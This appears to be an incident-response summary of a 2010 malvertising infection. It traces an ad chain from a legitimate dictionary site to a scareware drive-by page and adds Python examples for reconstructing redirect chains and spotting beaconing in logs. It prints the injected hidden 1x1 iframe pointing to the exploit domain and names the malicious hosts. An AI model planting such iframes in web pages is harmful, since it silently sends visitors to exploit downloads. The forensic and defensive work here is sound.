Infected PC Investigation Summary
6/8/10 infection
The story you are about to hear is true.
Only the names have been changed to
protect the innocent.
Hello,

A user's PC has been infected with a rogue antispyware called AV Security Suite. It keeps coming up with bogus viruses and has basically taken over the system. The network has been disconnected. The incident started yesterday, 6/08/10, around 4:25 pm. The user has access to level 2 protected info, but does not keep any of that info on her PC.

Thanks,
Tech Guy
• The user visited a legitimate site, medical-dictionary.thefreedictionary.com
• The site served advertising through interclick.com
• One of the advertising pulls came from a known "malvertising" domain, h7.ch.adtech.com.niklip.com. Malvertising domains serve obfuscated JavaScript that redirects browsers to malware "check-in" sites.
• Immediately after this pull, a request was made to a known malware "check-in" site, statsoplex.co.cc, which returned a hidden iframe. Check-in sites redirect browsers to SEO (Search Engine Optimization) exploit drive-by sites.
The iframe
<html><body><iframe src="http://aiosstatsungenett.com/info/nag3.html" style="visibility:hidden;" width="1" height="1"></iframe></body></html>
• The iframe loaded a scareware A/V page from a known SEO exploit drive-by site, aiosstatsungenett.com. The scareware page, nag3.html, was loaded with obfuscated malicious JavaScript.
• Two seconds later, the JavaScript from aiosstatsungenett.com initiated a 289K application stream to the browser from 188.65.x.x. The application stream turned out to be a malicious SWF (Flash) file. A malicious PDF was also downloaded.
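The chain above (legitimate page, ad network, malvertising domain, check-in site, hidden iframe, exploit page, binary payload from a bare IP) is exactly what an analyst has to reconstruct from proxy logs and captured responses. The following is an added example, not code from the presentation: it assumes a simple space-separated proxy log format (timestamp, client, method, URL, referrer, status, content type, bytes), walks the Referer chain backwards from a suspicious binary download, and flags hidden 1x1 or invisible iframes in a captured response body. The log lines are constructed to mirror the incident; the payload host 198.51.100.7 is a TEST-NET placeholder for the masked 188.65.x.x, and the interclick hostname and URL paths are made up.

```python
"""Malvertising chain triage (added example; log format and sample data are assumed)."""
import re
from datetime import datetime

# Constructed proxy log: timestamp client method url referrer status content-type bytes.
# "-" means no Referer header.  198.51.100.7 stands in for the masked 188.65.x.x.
SAMPLE_PROXY_LOG = """\
2010-06-08T16:25:01 10.0.0.25 GET http://medical-dictionary.thefreedictionary.com/glucose - 200 text/html 41233
2010-06-08T16:25:02 10.0.0.25 GET http://a.interclick.com/adserve?id=123 http://medical-dictionary.thefreedictionary.com/glucose 200 text/javascript 2110
2010-06-08T16:25:02 10.0.0.25 GET http://h7.ch.adtech.com.niklip.com/ad.js http://a.interclick.com/adserve?id=123 200 text/javascript 5120
2010-06-08T16:25:03 10.0.0.25 GET http://statsoplex.co.cc/in.php http://h7.ch.adtech.com.niklip.com/ad.js 200 text/html 160
2010-06-08T16:25:03 10.0.0.25 GET http://aiosstatsungenett.com/info/nag3.html http://statsoplex.co.cc/in.php 200 text/html 30211
2010-06-08T16:25:05 10.0.0.25 GET http://198.51.100.7/load.php?f=swf http://aiosstatsungenett.com/info/nag3.html 200 application/octet-stream 295936
2010-06-08T16:25:05 10.0.0.25 GET http://198.51.100.7/load.php?f=pdf http://aiosstatsungenett.com/info/nag3.html 200 application/pdf 18432
2010-06-08T16:25:07 10.0.0.25 GET http://www.example.org/ - 200 text/html 1024
"""

# The hidden iframe returned by the check-in site, as shown in the presentation.
SAMPLE_IFRAME_HTML = ('<html><body><iframe src="http://aiosstatsungenett.com/info/nag3.html" '
                      'style="visibility:hidden;" width="1" height="1"></iframe></body></html>')

BINARY_TYPES = {"application/octet-stream", "application/pdf", "application/x-shockwave-flash"}
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def parse_proxy_log(text):
    """Parse the assumed log format into dicts; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 8:
            continue
        ts, client, method, url, referrer, status, ctype, size = fields
        entries.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), "client": client,
                        "method": method, "url": url, "referrer": None if referrer == "-" else referrer,
                        "status": int(status), "ctype": ctype, "bytes": int(size)})
    return entries


def host_of(url):
    return re.sub(r"^https?://", "", url).split("/")[0].split(":")[0]


def is_suspicious_download(e, big=200_000):
    """Binary content served from a bare IP, or any large binary, is worth chasing."""
    return e["ctype"] in BINARY_TYPES and (IPV4.fullmatch(host_of(e["url"])) is not None or e["bytes"] >= big)


def find_suspicious_downloads(entries):
    return [e for e in entries if is_suspicious_download(e)]


def reconstruct_chain(entries, final_url, max_hop_seconds=10):
    """Walk Referer headers backwards from final_url (same client, each hop within the window).
    Returns the URLs from the originating page to the payload."""
    by_url = {}
    for e in entries:
        by_url.setdefault(e["url"], []).append(e)
    ends = by_url.get(final_url, [])
    if not ends:
        return []
    cur = max(ends, key=lambda e: e["ts"])
    chain, seen = [cur], {id(cur)}
    for _ in range(50):  # hard cap in case of referrer loops
        ref = cur["referrer"]
        if ref is None:
            break
        cands = [e for e in by_url.get(ref, []) if id(e) not in seen and e["client"] == cur["client"]
                 and 0 <= (cur["ts"] - e["ts"]).total_seconds() <= max_hop_seconds]
        if not cands:
            break
        cur = max(cands, key=lambda e: e["ts"])
        chain.append(cur)
        seen.add(id(cur))
    return [e["url"] for e in reversed(chain)]


def _dim(value):
    """Pixel size of a width/height attribute; missing or non-numeric counts as large."""
    if value is None:
        return 10**6
    m = re.match(r"\d+", value.strip())
    return int(m.group()) if m else 10**6


def find_hidden_iframes(html):
    """Return src of iframes that are invisible or at most 1x1 pixels."""
    found = []
    for m in re.finditer(r"<iframe\b([^>]*)>", html, re.I):
        attrs = {k.lower(): v for k, v in re.findall(r'([\w-]+)\s*=\s*"([^"]*)"', m.group(1))}
        style = attrs.get("style", "").replace(" ", "").lower()
        tiny = _dim(attrs.get("width")) <= 1 and _dim(attrs.get("height")) <= 1
        if "visibility:hidden" in style or "display:none" in style or tiny:
            found.append(attrs.get("src", ""))
    return found


if __name__ == "__main__":
    entries = parse_proxy_log(SAMPLE_PROXY_LOG)
    for dl in find_suspicious_downloads(entries):
        print(dl["url"], dl["bytes"], "bytes")
        for hop in reconstruct_chain(entries, dl["url"]):
            print("   <-", hop)
    print("hidden iframes:", find_hidden_iframes(SAMPLE_IFRAME_HTML))
```

The referrer walk only works where the browser sent a Referer on each hop (JavaScript-driven redirects and `<iframe>` loads normally do; `meta refresh` and some plugin loads do not), so a break in the chain is itself a finding: look at the surrounding two seconds of traffic from the same client to bridge the gap, as the timeline above does.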
The Malware Distribution Site
• Reverse lookup on 188.65.x.x: protect-ware.com
• Site title: "Antispyware Soft - Powerfull PC Protection !"
Interesting factoid
• All four of the domains above (niklip.com, statsoplex.co.cc, aiosstatsungenett.com and protect-ware.com) were registered within a month of the infection through a Chinese registrar, todaynic.com.
• Registrant addresses were in Lithuania, Russia, and Pennsylvania.
• IP addresses were in Austria, Belgium, and Sweden.
Another interesting factoid
• A study by Avast! (the A/V vendor) found that for every one infected adult site there were 99 infected legitimate, non-adult sites.
Sites that are known to have been referring clients to malicious advertising services related to this incident
The PC
• XP SP3, fully patched
• McAfee 8.7 with current engine and signatures
• Updated Adobe Reader
The Malware
• All JavaScript was obfuscated
• The payload was downloaded without user interaction
• Primarily scareware: it attempted to convince the user that Antivirus Soft could disinfect and protect her PC
• Pretty convincing product image and system tray icon. Would have fooled most users.
The Malware
• When the malware was uploaded to virustotal.com, only 3 of 41 products detected it (McAfee did not)
• The next day the detection rate had risen to 19 of 41, this time including McAfee
Results
• No indication from the firewall logs that this was anything more than an attempt to get the user to buy useless, and likely infected, software
• The PC was wiped, reloaded, and returned to the user
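The "no indication from firewall logs" conclusion rests on a concrete check: after the infection time, did the host talk to anything beyond the hosts already explained by the infection chain, and did any of that traffic look like command-and-control beaconing or bulk upload? The following is an added example, not part of the original investigation. It assumes a space-separated firewall log (timestamp, action, src:port, dst:port, protocol), uses the infection time from the report, and treats the payload host and the internal DNS server as already explained. The log lines, the internal addresses and the 198.51.100.7 / 203.0.113.9 / 192.0.2.44 destinations are constructed (documentation and TEST-NET ranges), not from the incident.

```python
"""Post-infection firewall log review (added example; log format and data are assumed)."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

INFECTED_HOST = "10.0.0.25"                 # constructed address for the user's PC
T0 = datetime(2010, 6, 8, 16, 25)           # infection time from the report (4:25 pm, 6/8/10)
CHAIN_HOSTS = {"198.51.100.7"}              # placeholder for the masked payload host 188.65.x.x
INTERNAL = {"10.0.0.2"}                     # e.g. the internal DNS server (constructed)

# Constructed firewall log: timestamp action src:port dst:port proto
SAMPLE_FW_LOG = """\
2010-06-08T16:20:10 ALLOW 10.0.0.25:51000 10.0.0.2:53 UDP
2010-06-08T16:25:05 ALLOW 10.0.0.25:51002 198.51.100.7:80 TCP
2010-06-08T16:26:00 ALLOW 10.0.0.25:51003 203.0.113.9:443 TCP
2010-06-08T16:27:00 ALLOW 10.0.0.25:51004 203.0.113.9:443 TCP
2010-06-08T16:28:00 ALLOW 10.0.0.25:51005 203.0.113.9:443 TCP
2010-06-08T16:29:01 ALLOW 10.0.0.25:51006 203.0.113.9:443 TCP
2010-06-08T16:30:15 DENY 10.0.0.25:51007 192.0.2.44:8080 TCP
2010-06-08T16:31:00 ALLOW 10.0.0.40:51008 203.0.113.9:443 TCP
"""


def parse_fw_log(text):
    """Parse the assumed log format; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue
        ts, action, src, dst, proto = fields
        src_ip, sport = src.rsplit(":", 1)
        dst_ip, dport = dst.rsplit(":", 1)
        entries.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), "action": action,
                        "src": src_ip, "sport": int(sport), "dst": dst_ip, "dport": int(dport), "proto": proto})
    return entries


def post_infection_contacts(entries, host, t0, exclude):
    """Destinations the host contacted (or tried to; DENY counts) at or after t0,
    minus the hosts we can already explain.  Returns dst -> sorted timestamps."""
    contacts = defaultdict(list)
    for e in entries:
        if e["src"] != host or e["ts"] < t0 or e["dst"] in exclude:
            continue
        contacts[e["dst"]].append(e["ts"])
    return {dst: sorted(times) for dst, times in contacts.items()}


def is_beacon(times, min_events=4, max_cv=0.1):
    """Regularly spaced connections (low coefficient of variation of the gaps)
    are the classic check-in signature; one-off contacts cannot qualify."""
    if len(times) < min_events:
        return False
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    m = mean(gaps)
    return m > 0 and pstdev(gaps) / m <= max_cv


def review(entries, host=INFECTED_HOST, t0=T0, exclude=CHAIN_HOSTS | INTERNAL):
    """Unexplained destinations after infection: (dst, connection count, beaconing?)."""
    contacts = post_infection_contacts(entries, host, t0, exclude)
    findings = [(dst, len(times), is_beacon(times)) for dst, times in contacts.items()]
    return sorted(findings, key=lambda f: (-f[1], f[0]))


if __name__ == "__main__":
    for dst, count, beacon in review(parse_fw_log(SAMPLE_FW_LOG)):
        print(f"{dst:16} {count:3d} connections  beaconing={beacon}")
```

In the constructed data the host checks in with 203.0.113.9 once a minute, which the report's own wording would not let you dismiss as "nothing more than scareware"; a clean result, as in the actual incident, is an empty or fully explained list. Denied connections are deliberately kept: a blocked outbound attempt is still evidence of what the malware wanted to reach.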